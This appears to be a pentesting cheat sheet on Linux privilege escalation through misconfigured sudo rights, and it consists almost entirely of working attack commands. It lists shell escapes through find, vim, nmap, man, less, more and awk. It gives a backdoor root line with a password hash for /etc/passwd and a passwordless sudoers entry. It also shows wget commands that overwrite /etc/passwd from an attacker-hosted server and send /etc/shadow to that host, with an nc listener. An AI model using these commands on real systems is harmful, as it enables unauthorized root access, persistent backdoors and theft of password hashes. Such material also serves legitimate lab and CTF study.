Comment on page
Exploiting SUDO Users
To Exploiting sudo user u need to find which command u have to allow.
sudo -l
Escalate Privilege to root user using command:
sudo find /etc/passwd -exec /bin/sh \;
sudo find /bin -name nano -exec /bin/sh \;
sudo vim -c '!sh'
# Oldway
sudo nmap --interactive
nmap> !sh
sh-4.1#
# Latest way
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
sudo man man
# press !sh and hit enter
sudo less /etc/hosts
# press !sh and hit enter
sudo more /etc/hosts
# press !sh and hit enter
sudo awk 'BEGIN {system("/bin/sh")}'
sudo nano /etc/passwd
sudo nano /etc/sudoers
Add this line in /etc/passwd to order to add the user as root privilege.
user:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
su user
Edit the entry for user
user to have access to all commands as sudo without a password:user ALL=(ALL) NOPASSWD:ALL
user ALL = (ALL:ALL) ALL
- Copy Target’s /etc/passwd file to attacker machine
- modify file and add a user in passwd file which is saved in the previous step to the attacker machine.
- append this line only => ayed:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
- host that passwd file to using any web server.sudo wget http://192.168.56.1:8080/passwd -O /etc/passwdsu ayed
- Note: if u want to dump file from a server like a root’s ssh key, Shadow file etc.
sudo wget --post-file=/etc/shadow 192.168.56.1:8080
nc –lvp 8080
sudo apache2 -f /etc/shadow